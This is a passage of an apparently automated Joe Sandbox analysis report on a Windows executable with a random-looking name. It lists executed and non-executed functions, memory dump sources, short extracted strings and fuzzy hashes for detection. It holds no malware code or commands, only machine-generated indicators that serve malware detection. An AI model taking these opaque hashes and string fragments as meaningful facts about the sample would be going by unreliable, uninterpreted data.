Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: 44B01200CE644F01B40831BE084206D7060BB44148FD402B0D84E40089F84D10D44292

Non-executed Functions

Function 00007FF887D309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FF887D30B4E
c9, xrefs: 00007FF887D30B56
#{9, xrefs: 00007FF887D30B3E
"s9, xrefs: 00007FF887D30B46

Memory Dump Source

Source File: 0000000D.00000002.1535851134.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff887d30000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 47c0b60897939649b7ce00a7661d9a86acd0d648304fcb3773cd270617ccc05b
Instruction ID: cc622070d3f773a016e1edc4b06f745d8038eabbb8addafcbf291706f69c27a8
Opcode Fuzzy Hash: 47c0b60897939649b7ce00a7661d9a86acd0d648304fcb3773cd270617ccc05b
Instruction Fuzzy Hash: 88416C07E485A795E11132FEF0122ED6B549F812B9B084677E17E89183CD0CB987C6F6

Analysis Process: xvmLxyNtcnPgpmdKoWywaPsdXPf.exePID: 2036, Parent PID: 3504COMMON

Executed Functions

Function 00007FF887D60D48 Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF887D60F17
5X_H, xrefs: 00007FF887D60DF3
r6B, xrefs: 00007FF887D60EC5
"9B, xrefs: 00007FF887D60DD1
r6B, xrefs: 00007FF887D60EA7

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: "9B$5X_H$b4B$r6B$r6B
API String ID: 0-214251217
Opcode ID: 5156684fdafafc8be919853f33ba953e8ccdf8089c2a68a5ed1a6707b8557416
Instruction ID: 7a6b836b84ddb0b3e14654cf991bcd75251935c825518ebda5c0ee5cb03da4ff
Opcode Fuzzy Hash: 5156684fdafafc8be919853f33ba953e8ccdf8089c2a68a5ed1a6707b8557416
Instruction Fuzzy Hash: ED71E375D18A898FEB89DB6888257BD7FF1FB96350F4401AAD01AC72DACE782811C741

Function 00007FF887D60E43 Relevance: 3.9, Strings: 3, Instructions: 144COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF887D60F17
r6B, xrefs: 00007FF887D60EC5
r6B, xrefs: 00007FF887D60EA7

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: 7e9859e1b133a8f5e0abf33d69bb0449ddd25ac978c19bf242bab06b45a17f32
Instruction ID: 4d7d19cae2b3ae6978fca123a9dcb6eb5582a9e0a146c12f4bb6aa682e4a2f27
Opcode Fuzzy Hash: 7e9859e1b133a8f5e0abf33d69bb0449ddd25ac978c19bf242bab06b45a17f32
Instruction Fuzzy Hash: 7F41F375918A898EEB88DF5CD8557BD7FE1FB96350F4001AED01AC76DACA782411C740

Function 00007FF887D608D0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a627fa1c5bd1f1cfbf03611392f6d29a5dc9a8934d85b63528197e783364328
Instruction ID: 5d3719bec8ca4f5eaf634bd6b6e724ce9c5f18e88038dea7e3ba26f7423f9d05
Opcode Fuzzy Hash: 8a627fa1c5bd1f1cfbf03611392f6d29a5dc9a8934d85b63528197e783364328
Instruction Fuzzy Hash: 89412522E4C6554AE604B7ACB0963FDB791EF853A1B0805BBE05EC719BDD18BC42C6C6

Function 00007FF887D63B90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d42f0a63579b6aa07edd1db49421141ecd2e2da6157709a778453f9c292445
Instruction ID: 4dd802e61502431d5c301dc7c075c014d3873bfa56619e33f905fd702bdf53f7
Opcode Fuzzy Hash: c6d42f0a63579b6aa07edd1db49421141ecd2e2da6157709a778453f9c292445
Instruction Fuzzy Hash: 22312231E489094BEBA4EA28C455BBD76F2FF94350F5502B5E01FD329ADE28BD41C781

Function 00007FF887D60998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5b534274c2ae9dc72a6fdb8a97bfeb03e226b9e5ee4ce3d6e6bcbb855a6106
Instruction ID: 5cb65db4eb2f3ca5664fbaa014adb82a4a5915c2ddef2afca415cb6d6420fbb3
Opcode Fuzzy Hash: 6b5b534274c2ae9dc72a6fdb8a97bfeb03e226b9e5ee4ce3d6e6bcbb855a6106
Instruction Fuzzy Hash: 0521D720B58A190FEB48B76C945A77EB2D2FB98351F14417AF40EC32D6DD18AC418281

Function 00007FF887D60C25 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87535c64aaa14945afa9e33452ad53c2d8c03d16151034ff7a2e67c342d625f
Instruction ID: e6249a90bfb7c85ffa43a90d184547c9f1e18f7afcfb00040047a910eba33f35
Opcode Fuzzy Hash: e87535c64aaa14945afa9e33452ad53c2d8c03d16151034ff7a2e67c342d625f
Instruction Fuzzy Hash: 47212C36E4C2498AE712A768D8415EC7B70FF413A5F1542B3D02A871C7D938754BC7D1

Function 00007FF887D60C38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2db7a83eb646b25a2f516877982726b064296a61e797bc216a5af80b994327
Instruction ID: eeb218235ab32395abd8fc70a1abad2358fbb7431dd66305fd9e484155a8ded3
Opcode Fuzzy Hash: ee2db7a83eb646b25a2f516877982726b064296a61e797bc216a5af80b994327
Instruction Fuzzy Hash: 6011A031A4C6498EE702DB68C8515EC7BB0FF42295F1542B2D05ADB196DA38764AC7C1

Function 00007FF887D60C40 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40a168fbbf210c2921fc4dd6179412ae760ff58133570ccce29c6d65f7bccf6b
Instruction ID: f33143d8d89aa95047121803a32b984301e5c1df880ee92d409738179a8c08cc
Opcode Fuzzy Hash: 40a168fbbf210c2921fc4dd6179412ae760ff58133570ccce29c6d65f7bccf6b
Instruction Fuzzy Hash: 9F118E3194D2898EE702DB68C4505AC7FB0FF42294F1542B6D056DB196DA386A49C7C1

Function 00007FF887D6417E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cecd16d9edc9164d27f244270ac9c2ab67eed72a17f278da7d84bcadda0adc8
Instruction ID: 34087420a53863a1336430298410feccbe6d1a4d86360760e2f1dcab208c4e1e
Opcode Fuzzy Hash: 1cecd16d9edc9164d27f244270ac9c2ab67eed72a17f278da7d84bcadda0adc8
Instruction Fuzzy Hash: 38010C70A48A198FDB98EB04C494EBD73B1FBA9354F1042A9E44FD72A5CE34B944CF81

Function 00007FF887D60C48 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479cd1b2a6fc6fcd56ddd3a3e3c4ce2a560cc7e5676e7bd851707e98e8648996
Instruction ID: f2dc8a8a4376dce89cf59ee36831c009a55fc825491e2d3b78ff233190c66411
Opcode Fuzzy Hash: 479cd1b2a6fc6fcd56ddd3a3e3c4ce2a560cc7e5676e7bd851707e98e8648996
Instruction Fuzzy Hash: B2018C31D4D2899FE702DB68C85059CBFB0BF42354F1542B6E056DB29ADA386A49C781

Function 00007FF887D60C50 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ff1ae4e1255ce266d889dd8de5f2914983a332eafc513387a18c52c5f10011
Instruction ID: 8b9ca4cd74f185d6dc01543b174df20a7ce85901321e2ef47251f777fa48d933
Opcode Fuzzy Hash: c6ff1ae4e1255ce266d889dd8de5f2914983a332eafc513387a18c52c5f10011
Instruction Fuzzy Hash: 44017130D4D289DFE711DB64C45059C7FB0BF06354F1542E6D055D718ADA386A45C781

Function 00007FF887D63C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: 83ce2d6129349176fe0e4471039e484a10b408200f8f446b9c203e35a5df2e92
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: BBF0C931A8881A8AFB64EA18CC54BBD72B2FB54351F1442B9D00FD7199CF787986CA80

Function 00007FF887D60B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca5554d765699166a84b0d9c9662fbf30b51f56a6d6fdd0d9f27c8f32c34f7e
Instruction ID: 72992d77ecc070527552602eeead23096da7361d979619b7a29ba7a4be3eb428
Opcode Fuzzy Hash: 1ca5554d765699166a84b0d9c9662fbf30b51f56a6d6fdd0d9f27c8f32c34f7e
Instruction Fuzzy Hash: 47E061765599448FC741DF78DCA50E47B50FF0220875612FED049D7172D321556EC740

Function 00007FF887D66D4F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction ID: 648d028484cf18c845bf7c7f94e80b712947c5d7a88e142f5e509ef00550b4e7
Opcode Fuzzy Hash: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction Fuzzy Hash: CAE09A24E0C01646FB98A294C8407BC6271FB94380F1811B9E90FA33C6CE38BE44CB95

Function 00007FF887D60CEE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction ID: 28ae63d763ad39f44f873cbb20defe1ad501dfe56add9355dca89d1200f59167
Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: CAE01234A4860ACBE700DB54C4849AD7771FB51365F148365D4168738DDE787694C7C0

Function 00007FF887D66DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: de2813612a8f28887c12c4a4272206afa60504777f8ac6cfe1eb94f34b046e13
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: E1D05E14D4C0034BFB94425480507B923B1EF55388F1812B5FA0F932D5DE68BC02CA94

Function 00007FF887D606A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: 770bb6290edf67b9f40cb045bee7bc4fd84e6756a1a1bd36fd22c416e4093162
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: 6FC08C00EEE50B02F40931AE14024ACA2207BC4294FE40333F51E400C9EC8D30C581C6

Function 00007FF887D65472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 741ac465fb9429775007861abb1acef490761ce78ba4bf1ee68f31001c522e41
Instruction ID: 84f19a2a7f1dcb0de5396f75c38e59e0716ad27b6e31a1cb7b2b4212d528afc6
Opcode Fuzzy Hash: 741ac465fb9429775007861abb1acef490761ce78ba4bf1ee68f31001c522e41
Instruction Fuzzy Hash: F8C04C05F1881656F5556298501527F05529B54B44F558139F52EC66CFCF1C6A0142C7

Function 00007FF887D606C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: 2459be32bf003fc6ef70dbadff1ac18cc456169c2b5d1eb42d98e3d673c26cff
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: CFB01200CF644F00E40C317E084206D70607B44148FE40270F80E40089E88D30D442C2

Non-executed Functions

Function 00007FF887D609B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FF887D60B4E
#{9, xrefs: 00007FF887D60B3E
"s9, xrefs: 00007FF887D60B46
c9, xrefs: 00007FF887D60B56

Memory Dump Source

Source File: 0000000E.00000002.1602104547.00007FF887D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d60000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: cf18bcfa04e7a80f2f2789b2b5c5e16f18439eba0b7fdd0456b99321cbdd8157
Instruction ID: 89aeab350f8dee4cf3495dcfd757de9165ff2990c8301b1615fcd83ffb716103
Opcode Fuzzy Hash: cf18bcfa04e7a80f2f2789b2b5c5e16f18439eba0b7fdd0456b99321cbdd8157
Instruction Fuzzy Hash: B3418902E585A295E10236FDF4022FC6B549F813F9B484677E07E89097CD0DB987CAF6

Analysis Process: xvmLxyNtcnPgpmdKoWywaPsdXPf.exePID: 3628, Parent PID: 2148COMMON

Executed Functions

Function 00007FF887D40F72 Relevance: 11.4, Strings: 8, Instructions: 1365COMMON

Download Yara Rule

Strings

}D, xrefs: 00007FF887D41210
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
p[D, xrefs: 00007FF887D419AA
p[D, xrefs: 00007FF887D41988
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$ }D$0#L$0#L$0#L$0#L$p[D$p[D
API String ID: 0-326778460
Opcode ID: 17d4327520e263e669dcf43cf8f93b41442eb3290318cfe3865feed33e78d288
Instruction ID: ae85d1aa3776c5251435f34b093f1ccc2e332779b4824ce9943de5334b921ebe
Opcode Fuzzy Hash: 17d4327520e263e669dcf43cf8f93b41442eb3290318cfe3865feed33e78d288
Instruction Fuzzy Hash: FCA2A331E9895A8FEA98EB28D4517BCB3F1FF54350F1406B9D01ED3296DE29AC82C741

Function 00007FF887D414C5 Relevance: 9.8, Strings: 7, Instructions: 1064COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
E, xrefs: 00007FF887D41540
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453
8hD, xrefs: 00007FF887D41581

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$ E$0#L$0#L$0#L$0#L$8hD
API String ID: 0-3979987510
Opcode ID: cfab4f82da0d29ffd05f7a04be227c7a7a8092fa4468f744c1a1f7f806f5c8e3
Instruction ID: 7f5fdde1d21217ad3212d5e9140a6a33f1521c64381027c1713a02e254a0c7d1
Opcode Fuzzy Hash: cfab4f82da0d29ffd05f7a04be227c7a7a8092fa4468f744c1a1f7f806f5c8e3
Instruction Fuzzy Hash: 30727431E9895A8FEA98EB18D4517B873F1FF54350F1442B9D00ED729ADE39AC82C741

Function 00007FF887D41461 Relevance: 7.3, Strings: 5, Instructions: 1014COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 99bc0a9a4716b250e2932ed03f7c93a2d457873d21cd40e902b031930b6cc90a
Instruction ID: c5af558a2d8bbe4616c518e0aa124e0ec06c899c8ab1962d19a337d1ba63fa9e
Opcode Fuzzy Hash: 99bc0a9a4716b250e2932ed03f7c93a2d457873d21cd40e902b031930b6cc90a
Instruction Fuzzy Hash: 29628431E9895A8FEA98EB28D4517B873F1FF54350F1442B9D00ED729ADE39AC82C741

Function 00007FF887D412AB Relevance: 7.2, Strings: 5, Instructions: 981COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 60516083d4eb1e061914a7c12c5949182d5d1cb9d0a5625cd718f536dce630d4
Instruction ID: b7089b496bc9545021a6d8bfc72634a0325e2ac3bd8892959dacaac42e7ac6bf
Opcode Fuzzy Hash: 60516083d4eb1e061914a7c12c5949182d5d1cb9d0a5625cd718f536dce630d4
Instruction Fuzzy Hash: C6627431E9895A8FEA98EB18D4517B873F1FF94350F1442B9D01ED329ADE39AC82C741

Function 00007FF887D41424 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 927d27f46955d3b8d405bf4bda6ad946683e50c24182d6b1883c063574d14ddc
Instruction ID: 4637f9d5ebb091e52afa1164ca275aa72cbc338f027b12a1da8e76164e791f34
Opcode Fuzzy Hash: 927d27f46955d3b8d405bf4bda6ad946683e50c24182d6b1883c063574d14ddc
Instruction Fuzzy Hash: 65627431E9895A8FEA98EB18D4517B873F1FF94350F1442B9D01ED329ADE39AC82C741

Function 00007FF887D413E0 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 6a34e15a44a484b627215351fa6e43f9890477e0e88776b94ad3a38d77000ff1
Instruction ID: edd2a3ecaef8849f9fba4f758256b156f3c03db5a9c42c66b4c904406acf1210
Opcode Fuzzy Hash: 6a34e15a44a484b627215351fa6e43f9890477e0e88776b94ad3a38d77000ff1
Instruction Fuzzy Hash: 19627431E9895A8FEA98EB18D4517B873F1FF94350F1442B9D01ED329ADE39AC82C741

Function 00007FF887D4139C Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 38b870c471db626e7601b827e0da419bd3d84d8531f589ddc3df6257a5ca2f29
Instruction ID: e82244ca237be94fcb990a86613016366a93928779234adb727f59a23bae6b98
Opcode Fuzzy Hash: 38b870c471db626e7601b827e0da419bd3d84d8531f589ddc3df6257a5ca2f29
Instruction Fuzzy Hash: 49627431E9895A8FEA98EB18D4517B873F1FF94350F1442B9D01ED329ADE39AC82C741

Function 00007FF887D41358 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: ad0f5e949e7a8dfd5565bbd58f394520051b7db1ebb4a12365da9b7f22bc77a2
Instruction ID: 9d0daa9f8649b5fdbd66d09376d8bbc7ecef181da55059e98948a6fd5fd7283a
Opcode Fuzzy Hash: ad0f5e949e7a8dfd5565bbd58f394520051b7db1ebb4a12365da9b7f22bc77a2
Instruction Fuzzy Hash: 02627431E9895A8FEA98EB18D4517B873F1FF94350F1442B9D01ED329ADE39AC82C741

Function 00007FF887D41314 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D41C3C
0#L, xrefs: 00007FF887D424B5
0#L, xrefs: 00007FF887D42487
6B, xrefs: 00007FF887D42453

Memory Dump Source

Source File: 00000013.00000002.1674450455.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887d40000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: ab4fbdeb1c20c25d0bc4e22b023111450ebf89135634c2fa66c934410e9f1512
